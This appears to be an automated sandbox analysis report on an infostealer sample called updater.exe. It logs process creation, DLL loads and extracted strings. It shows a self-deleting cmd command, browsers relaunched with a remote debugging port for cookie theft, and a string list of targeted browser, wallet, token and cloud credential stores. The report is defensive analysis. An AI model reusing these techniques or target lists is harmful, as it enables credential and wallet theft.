Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2332,i,4956213852841536756,7730517169440128935,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7032 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\vs268" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\updater.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\vs268" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2312,i,2291169248669740386,7514103051101934735,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=2488,i,5951683665883633308,6049568498423703109,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,5947646742752305411,13093796674475547670,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2332,i,4956213852841536756,7730517169440128935,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7032 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\updater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: updater.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: updater.exe

Static file information: File size 5340672 > 1048576

Source: updater.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x271c00
Source: updater.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x24e000

Source: updater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: vdr1.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BEDC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: updater.exe, 00000000.00000002.2454538216.000000000BEDC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: updater.exe

Static PE information: section name: .symtab

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run			Jump to behavior
